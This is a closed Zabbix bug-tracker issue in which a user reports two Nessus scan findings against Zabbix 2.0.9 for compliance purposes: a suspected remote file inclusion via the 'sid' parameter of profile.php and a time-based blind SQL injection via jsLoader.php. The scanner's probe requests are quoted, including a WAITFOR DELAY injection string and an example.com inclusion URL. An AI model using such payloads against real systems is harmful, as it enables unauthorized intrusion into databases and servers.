Uploaded image for project: 'ZABBIX BUGS AND ISSUES'
  1. ZABBIX BUGS AND ISSUES
  2. ZBX-7638

Security Issues with Zabbix 2.0.9

    XMLWordPrintable

Details

    • Defect (Security)
    • Status: Closed
    • Major
    • Resolution: Won't fix
    • 2.0.9
    • None
    • None
    • We run zabbix agents on our blades and a central Zabbix server in HA. These are all Centos 6.4 systems.

    Description

      We need to be be compliant towards several security guidelines from our customers and one step towards that is to run Nessus scan and get rid of as many findings as we can. When we run Nessus on our nodes running Zabbix, there are two High/Major warnings which seem code related and hence should be considered as bugs. If there is a way to work around these through setup configuration, we could surely look at that as well.

      There was ZBX-6652 raised for similar issues but these could have been re-introduced again in some build as our version is much higher than the fix version in that bug.

      39469 - CGI Generic Remote File Inclusion
      Using the POST HTTP method, Nessus found that :

      + The following resources may be vulnerable to web code injection :

      + The 'sid' parameter of the /zabbix/profile.php CGI :

      /zabbix/profile.php [messages[sounds.4]=no_sound.wav&autologin=1&lang=uk
      _UA&rows_per_page=50&messages[sounds.repeat]=-1&autologout=900&config=0&
      save=Save&url=&messages[enabled]=1&refresh=30&messages[sounds.3]=no_soun
      d.wav&autologout_visible=yes&messages[sounds.recovery]=no_sound.wav&mess
      ages[triggers.severities][5]=1&cancel=Cancel&print=1&sid=http://K93_YDsR
      .example.com/&messages[sounds.0]=no_sound.wav&messages[triggers.severiti
      es][4]=1&messages[triggers.recovery]=1&messages[sounds.2]=no_sound.wav&m
      essages[triggers.severities][3]=1&change_password=Change%20password&stop
      =Stop&messages[sounds.1]=no_sound.wav&messages[sounds.5]=no_sound.wav&me
      ssages[triggers.severities][2]=1&messages[triggers.severities][1]=1&star
      t=Play&messages[triggers.severities][0]=1&form_refresh=1&theme=darkorang
      e&messages[timeout]=60]

      -------- output --------
      <body class="originalblue">
      <div id="message-global-wrap"><div id="message-global"></div></div>
      [...] include/page_header.php:453]</li></ul></td></tr></table><table class="msgerr" cellpadding="0" cellspacing="0"><tr class=""><td class="clr"><div class="blacklink" onclick="javascript: showHide("msg_messages", IE ? "block" : "table");" title="Maximize/Minimize">Details</div></td><td class="msg_main msg" id="page_msg"><strong class="">ERROR: Zabbix has received an incorrect request.</strong></td></tr></table><table class="msgerr" cellpadding="0" cellspacing="0" id="msg_messages" style="width: 100%;"><tr class=""><td class="msg" colspan="1"><ul class="messages"><li class="error">Undefined index: alias [profile.php:36]</li><li class="info">Critical error. Incorrect value "http://K93_YDsR.example.com/&quot; for "sid" field.</li><li class="info">Operation cannot be performed due to unauthorized request.</li></ul></td></tr></table><table class="msgerr" cellpadding="0" cellspacing="0" id="msg_messages" style="width: 100%;"><tr class=""><td class="msg" colspan="1"><ul class="messages" style="height: 96px;"><li class="error">Undefined index: alias [includ [...]
      LINE 1: ...leid, userid, idx, value_str, type, idx2) VALUES (, 2, [...]
      ^ [include/db.inc.php:511]</li><li class="error">Error in query [I [...]
      ------------------------

      43160 (1) - CGI Generic SQL Injection (blind, time based)

      Using the GET HTTP method, Nessus found that :

      + The following resources may be vulnerable to blind SQL injection (time based) :

      + The 'showGuiMessaging' parameter of the /zabbix/jsLoader.php CGI :

      /zabbix/jsLoader.php?ver=2.0.9&lang=en_gb&showGuiMessaging=0'));WAITFOR%
      20DELAY%20'00:00:21';--

      -------- output --------
      if (typeof(locale) == "undefined") { var locale = {}; }
      locale['S_MAX_COOKIE_SIZE_REACHED'] = 'We are sorry, the maximum p [...]

      • (c) 2005-2009 Sam Stephenson
        *
      • Prototype is freely distributable under the terms of an MIT-sty [...]
      • For details, see the Prototype web site: http://www.prototypejs.org/
        *
                                                                                                                                        • [...]

      Attachments

        Activity

          People

            Unassigned Unassigned
            abhishek.singh Abhishek Singh
            Votes:
            0 Vote for this issue
            Watchers:
            1 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved: